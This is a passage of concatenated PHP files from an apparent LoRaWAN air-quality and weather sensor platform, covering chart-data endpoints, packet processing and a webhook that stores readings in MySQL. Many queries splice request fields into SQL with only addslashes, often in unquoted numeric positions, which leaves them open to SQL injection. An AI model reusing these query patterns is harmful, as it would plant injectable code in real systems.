$sql = 'SELECT * FROM point WHERE Nodeid = '.addslashes($_REQUEST['id']).' ORDER BY Priority LIMIT 1';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$tagid = $row['Id'];
}
$sql = 'SELECT * FROM measurement'.$tagid.' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY) ORDER BY Moment';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
if($i != 0) {
echo ', ';
}
echo '[new Date('.substr($row['Moment'], 0, 4).','.(substr($row['Moment'], 5, 2)-1).','.substr($row['Moment'], 8, 2).','.substr($row['Moment'], 11, 2).','.substr($row['Moment'], 14, 2).','.substr($row['Moment'], 17, 2).'), '.$row['Tagvalue'].']';
$i++;
}
echo ']';
break;
case 'fullnode':
echo '[';
$i = 0;
$tagid = 1;
$sql = 'SELECT * FROM point WHERE Nodeid = '.addslashes($_REQUEST['id']).' ORDER BY Priority';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = array('id' => $row['Id'], 'name' => $row['Name'], 'priority' => $row['Priority']);
}
$data = null;
foreach($points as $point) {
$sql = 'SELECT *, unix_timestamp(Moment) as Timestamp FROM measurement'.$point['id'];
if($daysback == 0) {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
} else {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL '.$startDay.' DAY) AND Moment < DATE_ADD(NOW(), INTERVAL -'.$daysback.' DAY)';
}
$sql .= ' ORDER BY Moment DESC';
if($limit != '') {
$sql = $sql.' LIMIT '.$limit;
}
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$data[$row['Timestamp']]['Moment'] = $row['Moment'];
$data[$row['Timestamp']]['Timestamp'] = $row['Timestamp'];
$data[$row['Timestamp']][$point['id']] = $row['Tagvalue'];
}
}
if($data != null) {
/*echo '<pre>';
var_dump($data);
exit();*/
usort($data, function($a, $b) {
return $a['Timestamp'] <=> $b['Timestamp'];
});
foreach($data as $row) {
if($i != 0) {
echo ', ';
}
echo '[new Date('.substr($row['Moment'], 0, 4).','.(substr($row['Moment'], 5, 2)-1).','.substr($row['Moment'], 8, 2).','.substr($row['Moment'], 11, 2).','.substr($row['Moment'], 14, 2).','.substr($row['Moment'], 17, 2).')';
foreach($points as $point) {
echo ', ';
if (array_key_exists($point['id'], $row)) {
if($row[$point['id']] != '') {
echo $row[$point['id']];
} else {
echo ' null';
}
} else {
echo ' null';
}
}
echo ']';
$i++;
}
}
echo ']';
break;
case 'combined':
switch($_REQUEST['id']) {
case 1:
$mesurementType = 'Temperatuur';
break;
case 2:
$mesurementType = 'Relative vochtigheid';
break;
case 3:
$mesurementType = 'Luchtdruk';
break;
case 4:
$mesurementType = 'Lichtintensiteit';
break;
case 5:
$mesurementType = 'Batterij';
break;
case 6:
$mesurementType = 'Radio actieve straling';
break;
case 7:
$mesurementType = 'Fijnstof';
break;
case 8:
$mesurementType = 'PM2.5';
break;
case 9:
$mesurementType = 'PM10';
break;
case 10:
break;
case 11:
break;
case 12:
break;
default:
echo 'Onbekend type.';
exit;
break;
}
echo '[';
$i = 0;
$tagid = 1;
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE node.id = point.Nodeid AND point.Name LIKE \'%'.$mesurementType.'%\' AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
if($_REQUEST['id'] == 10) {
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)) OR (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY))';
//echo $sql;
}
if($_REQUEST['id'] == 11) {
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
if($_REQUEST['id'] == 12) {
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = array('id' => $row['Id'], 'name' => $row['Name'], 'priority' => $row['Priority']);
}
$data = null;
foreach($points as $point) {
$sql = 'SELECT *, unix_timestamp(Moment) as Timestamp FROM measurement'.$point['id'];
if($daysback == 0) {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
} else {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL '.$startDay.' DAY) AND Moment < DATE_ADD(NOW(), INTERVAL -'.$daysback.' DAY)';
}
$sql .= ' ORDER BY Moment';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$data[$row['Timestamp']]['Moment'] = $row['Moment'];
$data[$row['Timestamp']][$point['id']] = $row['Tagvalue'];
}
}
foreach($data as $row) {
if($i != 0) {
echo ', ';
}
echo '[new Date('.substr($row['Moment'], 0, 4).','.(substr($row['Moment'], 5, 2)-1).','.substr($row['Moment'], 8, 2).','.substr($row['Moment'], 11, 2).','.substr($row['Moment'], 14, 2).','.substr($row['Moment'], 17, 2).')';
foreach($points as $point) {
echo ', ';
if(array_key_exists($point['id'], $row)){
if($row[$point['id']] != '') {
echo $row[$point['id']];
} else {
echo ' null';
}
} else {
echo ' null';
}
}
echo ']';
$i++;
}
echo ']';
break;
case 'messages':
echo '[';
$i = 0;
$tagid = 1;
$data = null;
$sql = 'SELECT YEAR(Moment) AS \'Year\', MONTH(Moment) AS \'Month\', DAY(Moment) AS \'Day\', HOUR(Moment) AS \'Hour\', Count(*) AS \'Aantal\' FROM apeldoornindata.loraraw WHERE Moment >= DATE_ADD(NOW(), INTERVAL -24 HOUR) GROUP BY DAY(Moment), HOUR(Moment)';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
if($i != 0) {
echo ', ';
}
echo '[new Date('.$row['Year'].','.($row['Month']-1).','.$row['Day'].','.$row['Hour'].',0,0), '.$row['Aantal'];
echo ']';
$i++;
}
echo ']';
break;
default:
echo 'Onbekend type.';
break;
}
?><file_sep><?php
function ERSTemp($payload) {
echo 'Payload: '.$payload.'<br/>';
echo 'Base64: '.base64_decode($payload).'<br/>';
echo 'Hex: '.strhex($payload).'<br/>';
}
function strhex($string) {
$hexstr = unpack('H*', $string);
return array_shift($hexstr);
}
ERSTemp("AQD+AjQEAtYFBAcNSBEA");
?><file_sep><?php
include('db.php');
logerror('start Cron');
$sql = 'SELECT * FROM loraraw WHERE processed = 0 LIMIT 1000';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
echo $row['Moment'].'<br/>';
$data = json_decode($row['Data']);
$devId = addslashes($data->dev_id);
$hwSerial = addslashes($data->hardware_serial);
$nodeId = null;
$nodeId = insertOrCreateNode($devId, $hwSerial);
processNodeStatistics($data, $nodeId);
processGatewayStatistics($data);
$sqlUpdate = 'UPDATE loraraw SET Processed=1, Nodeid= '.$nodeId.' WHERE Id = '.$row['Id'];
//echo $sqlUpdate.'<br/>';
mysqlquery($sqlUpdate);
}
function insertOrCreateNode($devId, $hwSerial) {
$sql = 'SELECT * FROM node WHERE Devid = \''.addslashes($devId).'\' AND Hwserial = \''.addslashes($hwSerial).'\'';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeId = $row['Id'];
}
if($nodeId == null) {
$sqlInsert = 'INSERT node SET Devid=\''.$devId.'\', Hwserial=\''.$hwSerial.'\'';
//echo $sqlInsert.'<br/>';
mysqlquery($sqlInsert);
}
$sql = 'SELECT * FROM node WHERE Devid = '.addslashes($devId).' AND Hwserial = '.addslashes($hwSerial);
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeId = $row['Id'];
}
return $nodeId;
}
function processNodeStatistics($data, $nodeId) {
$sqlSfString = '';
if(strpos($data->metadata->data_rate, 'SF7') !== false) {
$sqlSfString .= ', Sf7 = Sf7 + 1';
}
if(strpos($data->metadata->data_rate, 'SF8') !== false) {
$sqlSfString .= ', Sf8 = Sf8 + 1';
}
if(strpos($data->metadata->data_rate, 'SF9') !== false) {
$sqlSfString .= ', Sf9 = Sf9 + 1';
}
if(strpos($data->metadata->data_rate, 'SF10') !== false) {
$sqlSfString .= ', Sf10 = Sf10 + 1';
}
if(strpos($data->metadata->data_rate, 'SF11') !== false) {
$sqlSfString .= ', Sf11 = Sf11 + 1';
}
if(strpos($data->metadata->data_rate, 'SF12') !== false) {
$sqlSfString .= ', Sf12 = Sf12 + 1';
}
foreach($data->metadata->gateways as $gateway)
{
$sqlChannelString = '';
switch($gateway->channel) {
case 0:
$sqlChannelString .= ', Ch0 = Ch0 + 1';
break;
case 1:
$sqlChannelString .= ', Ch1 = Ch1 + 1';
break;
case 2:
$sqlChannelString .= ', Ch2 = Ch2 + 1';
break;
case 3:
$sqlChannelString .= ', Ch3 = Ch3 + 1';
break;
case 4:
$sqlChannelString .= ', Ch4 = Ch4 + 1';
break;
case 5:
$sqlChannelString .= ', Ch5 = Ch5 + 1';
break;
case 6:
$sqlChannelString .= ', Ch6 = Ch6 + 1';
break;
case 7:
$sqlChannelString .= ', Ch7 = Ch7 + 1';
break;
}
}
$sql2 = 'UPDATE node SET Lastmessage=NOW()'.$sqlSfString.' '.$sqlChannelString.', Packets = Packets + 1 WHERE Id = '.$nodeId;
//echo $sql2;
mysqlquery($sql2);
}
function processGatewayStatistics($data) {
$sqlSfString = '';
if(strpos($data->metadata->data_rate, 'SF7') !== false) {
$sqlSfString .= ', Sf7 = Sf7 + 1';
}
if(strpos($data->metadata->data_rate, 'SF8') !== false) {
$sqlSfString .= ', Sf8 = Sf8 + 1';
}
if(strpos($data->metadata->data_rate, 'SF9') !== false) {
$sqlSfString .= ', Sf9 = Sf9 + 1';
}
if(strpos($data->metadata->data_rate, 'SF10') !== false) {
$sqlSfString .= ', Sf10 = Sf10 + 1';
}
if(strpos($data->metadata->data_rate, 'SF11') !== false) {
$sqlSfString .= ', Sf11 = Sf11 + 1';
}
if(strpos($data->metadata->data_rate, 'SF12') !== false) {
$sqlSfString .= ', Sf12 = Sf12 + 1';
}
foreach($data->metadata->gateways as $gateway)
{
$sqlChannelString = '';
switch($gateway->channel) {
case 0:
$sqlChannelString .= ', Ch0 = Ch0 + 1';
break;
case 1:
$sqlChannelString .= ', Ch1 = Ch1 + 1';
break;
case 2:
$sqlChannelString .= ', Ch2 = Ch2 + 1';
break;
case 3:
$sqlChannelString .= ', Ch3 = Ch3 + 1';
break;
case 4:
$sqlChannelString .= ', Ch4 = Ch4 + 1';
break;
case 5:
$sqlChannelString .= ', Ch5 = Ch5 + 1';
break;
case 6:
$sqlChannelString .= ', Ch6 = Ch6 + 1';
break;
case 7:
$sqlChannelString .= ', Ch7 = Ch7 + 1';
break;
}
$sql1 = 'INSERT INTO gateway SET Lastmessage=NOW(), Gateway= \''.addslashes($gateway->gtw_id).'\' '.$sqlSfString.' '.$sqlChannelString.', Packets = Packets + 1 ON DUPLICATE KEY UPDATE Lastmessage=NOW() '.$sqlSfString.' '.$sqlChannelString.', Packets = Packets + 1 ';
//echo $sql;
mysqlquery($sql1);
}
}
?><file_sep><?php
set_time_limit(60);
include('db.php');
logerror('start loradata');
//logerror("Postcount: ". count($_POST));
//logerror(implode(",", $_POST));
//logerror("Requestcount: ". count($_REQUEST));
//logerror(implode(",", $_REQUEST));
//logerror("Getcount: ". count($_GET));
//logerror(implode(",", $_GET));
//$data = json_decode(file_get_contents('php://input'));
//logerror($data);
//logerror($HTTP_RAW_POST_DATA);
//$data = json_decode(file_get_contents('php://stdin'));
//logerror($data);
//logerror("Rawpostttnmapper: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
echo 'Thanks';
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO lorarawttnmapper SET Moment=NOW(), Data= \''.addslashes($ruweData).'\'';
logerror('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
if(addslashes($data->payload_fields->latitude) > 86 || addslashes($data->payload_fields->latitude) < -86) {
logerror('Invalid latitude');
die('Invalid latitude');
}
if(addslashes($data->payload_fields->longitude) > 180 || addslashes($data->payload_fields->longitude) < -180) {
logerror('Invalid longitude');
die('Invalid longitude');
}
logerror("Rawpostttnmappersql: $data->dev_id: ".$data->dev_id);
if($data->dev_id == 'paxcounter01') {
$sql = 'INSERT INTO gpslocation1 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude).', Alt='.addslashes($data->payload_fields->altitude).', Hdop='.addslashes($data->payload_fields->hdop);
logerror("Rawpostttnmappersql: ".$sql);
//echo $sql;
$result = mysqlquery($sql);
}
if($data->dev_id == 'kiptracker') {
$sql = 'INSERT INTO gpslocation2 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->gps_0->latitude).', Lon='.addslashes($data->payload_fields->gps_0->longitude).', Alt='.addslashes($data->payload_fields->gps_0->altitude);
logerror("Rawpostttnmappersql: ".$sql);
//echo $sql;
$result = mysqlquery($sql);
}
//$last_id = mysqli_insert_id();
//logerror('Result last insert id: '.$last_id);
/*
foreach($data->metadata->gateways as $gateway)
{
$sql1 = 'INSERT INTO gpsgateway SET Gpslocationid=\''.$last_id.'\', Gwid=\''.addslashes($gateway->gtw_id).'\', Channel=\''.addslashes($gateway->channel).'\', Rssi=\''.addslashes($gateway->rssi).'\', Snr=\''.addslashes($gateway->snr).'\'';
//echo $sql1;
}
*/
}
//{"app_id":"industrialit","dev_id":"node1","hardware_serial":"0000000002E00612","port":1,"counter":8416,"payload_raw":"MTYuNzszOC4xAGxkIQ==","payload_fields":{"byte1":49,"byte2":54,"byte3":46,"byte4":55,"byte5":59,"byte6":51,"byte7":56,"byte8":46,"byte9":49},"metadata":{"time":"2017-06-04T20:54:21.770859698Z","frequency":867.1,"modulation":"LORA","data_rate":"SF7BW125","coding_rate":"4/5","gateways":[{"gtw_id":"eui-aa555a0000088213","timestamp":2927612339,"time":"2017-06-04T20:54:19.648782Z","channel":3,"rssi":-118,"snr":-6,"latitude":52.21176,"longitude":5.96243,"altitude":65}]},"downlink_url":"https://integrations.thethingsnetwork.org/ttn-eu/api/v2/down/industrialit/cloudscada?key=<KEY>"}
?>
<file_sep><?php
include('db.php');
include('elsys.php');
include('tabs.php');
logerror('start loradata');
//logerror("Postcount: ". count($_POST));
//logerror(implode(",", $_POST));
//logerror("Requestcount: ". count($_REQUEST));
//logerror(implode(",", $_REQUEST));
//logerror("Getcount: ". count($_GET));
//logerror(implode(",", $_GET));
$data = json_decode(file_get_contents('php://input'));
logerror('phpInput: '.json_encode($data));
//logerror($HTTP_RAW_POST_DATA);
//$data = json_decode(file_get_contents('php://stdin'));
//logerror('stdin: '.$data);
//logerror("Rawpost: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
echo 'Thanks';
$sendToLuftDaten = false;
$luftdatenSensorName = '';
$sendToRIVM = false;
function insertIntoInflux($nodeName, $insertData) {
logerror('Insert into Influx: '.$nodeName.' '.$insertData);
$ch = curl_init('http://localhost:8086/write?db=aid');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $nodeName.' '.$insertData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
$influxData = '';
logerror('LoraEndpoint: '.file_get_contents('php://input'));
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO loraraw SET Moment=NOW(), Data= \''.addslashes($ruweData).'\'';
//logerror('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
switch($data->hardware_serial) {
case '0000000002E00612':
$resultString = "";
$resultString .= chr($data->payload_fields->byte1);
$resultString .= chr($data->payload_fields->byte2);
$resultString .= chr($data->payload_fields->byte3);
$resultString .= chr($data->payload_fields->byte4);
$resultString .= chr($data->payload_fields->byte5);
$resultString .= chr($data->payload_fields->byte6);
$resultString .= chr($data->payload_fields->byte7);
$resultString .= chr($data->payload_fields->byte8);
$resultString .= chr($data->payload_fields->byte9);
logError('Resultstring: '.$resultString);
$resultArray = explode(';', $resultString);
$sql = 'INSERT INTO measurement8 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($resultArray[0]);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement9 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($resultArray[1]);
//echo $sql;
$result = mysqlquery($sql);
break;
case 'AF5EE00000000001':
$sql = 'INSERT INTO measurement3 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_0);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement4 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement5 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_out_4);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement6 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_2);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement7 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
break;
/*case '0004A30B001ECB0C':
if($data->dev_id == 'rfsee_aid_sensor_1') {
$sql = 'INSERT INTO measurement10 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_0);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement11 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_1);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement12 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_2);
//echo $sql;
$result = mysqlquery($sql);
if(isset($data->payload_fields->digital_in_3)) {
$sql = 'INSERT INTO measurement13 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break; */
case '0004A30B001F805A':
if($data->dev_id == 'rfsee_aid_sensor_1') {
if(isset($data->payload_fields->temperature_0)) {
$sql = 'INSERT INTO measurement22 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_1)) {
$sql = 'INSERT INTO measurement23 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_2)) {
$sql = 'INSERT INTO measurement24 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->digital_in_3)) {
$sql = 'INSERT INTO measurement25 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000002E00613':
if($data->dev_id == 'industrial_it_aid') {
$sql = 'INSERT INTO measurement14 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_1);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement15 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_2);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement16 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_3);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement17 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_4);
//echo $sql;
$result = mysqlquery($sql);
$nodeName = strtolower(str_replace('-', '', preg_replace('/\s+/', '', 'Industrial IT AiD')));
$influxData .= 'lux='.floatval($data->payload_fields->luminosity_1);
$influxData .= ',temperatuur='.floatval($data->payload_fields->temperature_2);
$influxData .= ',vochtigheid='.floatval($data->payload_fields->relative_humidity_3);
$influxData .= ',luchtdruk='.floatval($data->payload_fields->barometric_pressure_4);
insertIntoInflux($nodeName, $influxData);
}
break;
case '00998AF97646CF13':
if($data->dev_id == 'rfsee_aid_sensor_2') {
if(isset($data->payload_fields->temperature_10)) {
$sql = 'INSERT INTO measurement18 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_20)) {
$sql = 'INSERT INTO measurement19 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_20);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_2)) {
$sql = 'INSERT INTO measurement20 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_2);
//echo $sql;
$result = mysqlquery($sql);
}
// Accu
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement21 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_51)) {
$sql = 'INSERT INTO measurement27 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_51);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_50)) {
$sql = 'INSERT INTO measurement28 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_50);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '002CC2194BADD5C0':
if($data->dev_id == 'rfsee_aid_sensor_4') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement29 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement30 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_4)) {
$sql = 'INSERT INTO measurement31 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_4);
//echo $sql;
$result = mysqlquery($sql);
}
/*
if(isset($data->payload_fields->digital_in_3)) {
$sql = 'INSERT INTO measurement32 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
}*/
}
break;
case '0014115D20F6F977':
if($data->dev_id == 'dust_sensor1') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement33 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case 'AF5EE00098767651':
if($data->dev_id == 'rfsee_aid_sensor_3') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement34 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement35 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case 'AF5EE05500000004':
if($data->dev_id == 'rfsee_aid_sensor_5') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement36 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement37 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0004A30B001B462B':
if($data->dev_id == 'rfsee_aid_sensor_10') {
if(isset($data->payload_fields->temperature_10)) {
$sql = 'INSERT INTO measurement44 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_20)) {
$sql = 'INSERT INTO measurement45 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_20);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_30)) {
$sql = 'INSERT INTO measurement46 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_30);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_51)) {
$sql = 'INSERT INTO measurement47 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_51);
//echo $sql;
$result = mysqlquery($sql);
$pm10 = $data->payload_fields->luminosity_51;
}
if(isset($data->payload_fields->luminosity_50)) {
$sql = 'INSERT INTO measurement48 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_50);
//echo $sql;
$result = mysqlquery($sql);
$pm25 = $data->payload_fields->luminosity_50;
}
$sendToRIVM = true;
$rivmSensorName = 'rfsee_aid_sensor_10 lat=52.211453,lon=5.983743';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-rfsee10';
}
break;
case '0004A30B001BF828':
if($data->dev_id == 'rfsee_aid_sensor_11') {
if(isset($data->payload_fields->temperature_10)) {
$sql = 'INSERT INTO measurement49 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_20)) {
$sql = 'INSERT INTO measurement50 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_20);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_30)) {
$sql = 'INSERT INTO measurement51 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_30);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_51)) {
$sql = 'INSERT INTO measurement52 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_51);
//echo $sql;
$result = mysqlquery($sql);
$pm10 = $data->payload_fields->luminosity_51;
}
if(isset($data->payload_fields->luminosity_50)) {
$sql = 'INSERT INTO measurement53 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_50);
//echo $sql;
$result = mysqlquery($sql);
$pm25 = $data->payload_fields->luminosity_50;
}
$sendToRIVM = true;
$rivmSensorName = 'rfsee_aid_sensor_11 lat=52.18168,lon=5.94374';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-rfsee11';
}
break;
case '007218160B8DD4F9':
if($data->dev_id == 'dustsensor_01') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement59 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$sql = 'INSERT INTO measurement150 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_2)) {
$sql = 'INSERT INTO measurement144 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_3)) {
$sql = 'INSERT INTO measurement145 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_3);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_4)) {
$sql = 'INSERT INTO measurement146 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_4);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000001':
if($data->dev_id == 'ttn_apld_dust_0000000000000001') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement60 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000001') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement169 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
